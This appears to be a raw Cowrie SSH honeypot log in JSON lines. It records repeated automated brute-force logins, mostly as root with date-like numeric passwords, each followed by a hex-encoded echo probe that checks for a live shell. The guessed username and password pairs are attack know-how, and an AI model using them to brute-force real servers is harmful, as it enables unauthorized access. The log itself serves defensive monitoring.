{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.367332Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.368302Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"df410fbe6735","protocol":"ssh","message":"New connection: 212.227.125.160:53380 (1.2.3.4:22) [session: df410fbe6735]","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.388980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.389752Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.411862Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.login.success","username":"root","password":"260484","message":"login attempt [root/260484] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.493153Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:40.559404Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.560130Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.595663Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.596721Z","src_ip":"212.227.125.160","session":"df410fbe6735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53382,"dst_ip":"1.2.3.4","dst_port":22,"session":"82c73158439d","protocol":"ssh","message":"New connection: 212.227.125.160:53382 (1.2.3.4:22) [session: 82c73158439d]","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.626019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.627070Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.649534Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.login.success","username":"root","password":"260288","message":"login attempt [root/260288] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.769040Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:40.965069Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.965742Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.994143Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.995158Z","src_ip":"212.227.125.160","session":"82c73158439d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42454,"dst_ip":"1.2.3.4","dst_port":22,"session":"99a67f715d9b","protocol":"ssh","message":"New connection: 212.227.125.160:42454 (1.2.3.4:22) [session: 99a67f715d9b]","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.017989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.019172Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.042105Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.login.success","username":"root","password":"251287","message":"login attempt [root/251287] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.117371Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:56.224877Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.225592Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.249761Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:56.252729Z","src_ip":"212.227.125.160","session":"99a67f715d9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42456,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff41dc5a9ac","protocol":"ssh","message":"New connection: 212.227.125.160:42456 (1.2.3.4:22) [session: eff41dc5a9ac]","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.299797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.351734Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.373430Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.login.success","username":"root","password":"251179","message":"login attempt [root/251179] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.641730Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:58.878412Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.879143Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.972741Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:58.973861Z","src_ip":"212.227.125.160","session":"eff41dc5a9ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44058,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a5d45b7dfa","protocol":"ssh","message":"New connection: 212.227.125.160:44058 (1.2.3.4:22) [session: 24a5d45b7dfa]","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.070988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.071816Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.094651Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.login.success","username":"root","password":"25051989","message":"login attempt [root/25051989] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.168188Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:29:14.300369Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.301213Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.325122Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:29:14.326546Z","src_ip":"212.227.125.160","session":"24a5d45b7dfa"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35930,"dst_ip":"1.2.3.4","dst_port":22,"session":"44fff33ac680","protocol":"ssh","message":"New connection: 196.251.86.249:35930 (1.2.3.4:22) [session: 44fff33ac680]","sensor":"my-vps","timestamp":"2025-08-26T10:29:31.593074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:29:32.032049Z","src_ip":"196.251.86.249","session":"44fff33ac680"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:29:32.032748Z","src_ip":"196.251.86.249","session":"44fff33ac680"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"q1w2e3r4","message":"login attempt [oracle/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-26T10:29:33.862564Z","src_ip":"196.251.86.249","session":"44fff33ac680"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:29:35.421289Z","src_ip":"196.251.86.249","session":"44fff33ac680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38802,"dst_ip":"1.2.3.4","dst_port":22,"session":"783895bd8c26","protocol":"ssh","message":"New connection: 212.227.125.160:38802 (1.2.3.4:22) [session: 783895bd8c26]","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.349211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.351272Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.373341Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.login.success","username":"root","password":"240790","message":"login attempt [root/240790] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.476027Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:29:59.540299Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.541225Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.576129Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:29:59.577343Z","src_ip":"212.227.125.160","session":"783895bd8c26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37529,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c60ef07863e","protocol":"ssh","message":"New connection: 212.227.235.229:37529 (1.2.3.4:22) [session: 4c60ef07863e]","sensor":"my-vps","timestamp":"2025-08-26T10:30:09.885489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:30:09.886532Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:30:10.097826Z","src_ip":"212.227.235.229","session":"4c60ef07863e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38818,"dst_ip":"1.2.3.4","dst_port":22,"session":"821bfc6cc05e","protocol":"ssh","message":"New connection: 212.227.125.160:38818 (1.2.3.4:22) [session: 821bfc6cc05e]","sensor":"my-vps","timestamp":"2025-08-26T10:30:10.811397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:10.812027Z","src_ip":"212.227.125.160","session":"821bfc6cc05e"}
